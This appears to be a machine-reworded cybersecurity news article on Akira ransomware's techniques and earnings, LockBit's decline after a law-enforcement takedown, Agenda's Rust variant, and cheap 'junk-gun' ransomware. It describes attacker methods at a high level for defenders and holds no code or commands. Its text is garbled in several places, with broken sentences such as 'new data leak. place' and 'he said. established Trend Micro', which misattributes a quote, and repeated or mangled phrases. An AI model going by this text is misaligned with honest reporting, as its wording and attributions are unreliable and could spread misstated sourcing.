Threat actors behind the Akira ransomware group have extorted approximately $42 million in illicit proceeds after breaching the networks of more than 250 victims as of January 1, 2024.
“Since March 2023, the Akira ransomware has impacted a wide range of businesses and critical infrastructure entities across North America, Europe and Australia,” cybersecurity agencies from the Netherlands and the United States said in a statement , together with Europol’s European Cybercrime Center (EC3). joint alert.
“In April 2023, after initially focusing on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines.”
The double extortion group was observed to be using a C++ variant of the locker in the early stages, before switching to Rust-based code starting in August 2023. It is worth noting that the e-crime perpetrator is completely different from the Akira ransomware family that was active in 2017.
Initial access to target networks is facilitated by exploiting known flaws in Cisco equipment (e.g. CVE-2020-3259 and CVE-2023-20269).
Alternative vectors involve the use of Remote Desktop Protocol (RDP), spear-phishing, valid credentials, and virtual private network (VPN) services that lack multi-factor authentication (MFA) protections.
Akira authors are also known to exploit various ways to set up persistence by creating a new domain account on the compromised system, as well as evade detection by abusing the Zemana AntiMalware driver to terminate antivirus-related processes via what is called Bring Your Own Vulnerable Driver (BYOVD) attack.
To aid privilege escalation, the attacker relies on credential scraping tools such as Mimikatz and LaZagne, while Windows RDP is used to move laterally within the victim’s network. Data exfiltration is performed via FileZilla, WinRAR, WinSCP and RClone.
“Akira ransomware encrypts targeted systems using a hybrid encryption algorithm that combines Chacha20 and RSA,” Trend Micro said in an analysis of the ransomware published in October 2023.
“Additionally, the Akira ransomware binary, like most modern ransomware binaries, has a feature that allows it to inhibit system recovery by deleting shadow copies from the affected system.”
Blockchain and source code data suggests that the Akira ransomware group is likely affiliated with the now-defunct Conti ransomware gang. A decryptor for Akira was released by Avast last July, but it is very likely that the shortcomings have since been filled.
Akira’s mutation to target Linux enterprise environments also follows similar moves by other established ransomware families such as LockBit, Cl0p, Royal, Monti, and RTM Locker.
LockBit’s difficulties to go back
The disclosure comes as Trend Micro revealed that law enforcement’s massive takedown of the prolific LockBit gang in early February had a significant operational and reputational impact on the group’s ability to recover, prompting it to publish old and fake victims about its new data leak. place.
“LockBit has been one of the most prolific and widely used RaaS strains around, with potentially hundreds of affiliates, including many associated with other major strains,” Chainalysis noted in February.
The blockchain analytics firm said it has discovered cryptocurrency trails linking a LockBit administrator to a Sevastopol-based journalist known as Colonel Cassad, who has a history of soliciting donations for Russian militia group operations in sanctioned jurisdictions of Donetsk and Luhansk following the start of the Russian war. -Ukrainian War in 2022.
It is worth pointing out that Cisco Talos, in January 2022, linked Colonel Cassad (aka Boris Rozhin) to an anti-Ukraine disinformation campaign orchestrated by the Russian state-sponsored group known as APT28.
“Following the operation, LockBitSupp [the alleged leader of LockBit] appears to be attempting to inflate the apparent number of victims, while also focusing on posting victims from countries whose law enforcement agencies participated in the disruption,” Trend Micro said in a recent insight.
“This is perhaps an attempt to reinforce the narrative that the system would come back stronger and target those responsible for its disruption.”
In an interview with Recorded Future News last month, LockBitSupp acknowledged short-term profit declines but promised to improve its security measures and “work as long as my heart beats.”
“Reputation and trust are key to attracting affiliates, and when these are lost, it is more difficult to convince people to return. The Cronos operation has managed to hit one of the most important elements of its business: its brand,” he said. established Trend Micro.
The agenda returns with an updated Rust version
The development also follows the Agenda ransomware group (aka Qilin and Water Galura) using an updated Rust variant to infect VMWare vCenter and ESXi servers via remote monitoring and management (RMM) tools and Cobalt Strike.
“The Agenda ransomware’s ability to spread to virtual machine infrastructure demonstrates that its operators are also expanding to new targets and systems,” the cybersecurity firm said.
Even as a new crop of ransomware authors continues to energize the threat landscape, it is also becoming increasingly clear that the “raw, cheap ransomware” sold in the cybercrime underground is being used in real-world attacks, allowing individual authors to lower-level threats to generate significant profits without having to be part of a well-organized group.
Interestingly, most of these varieties are available for a one-time, one-time price starting from just $20 for a single build, while some others like HardShield and RansomTuga are offered at no additional cost.
“Far from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to take action cheaply, easily and independently,” Sophos said, describing it as a “relatively new phenomenon” that further reduces the cost of entry.
“They can target small businesses and individuals, who are unlikely to have the resources to defend themselves or respond effectively to incidents, without giving anyone else a cut.”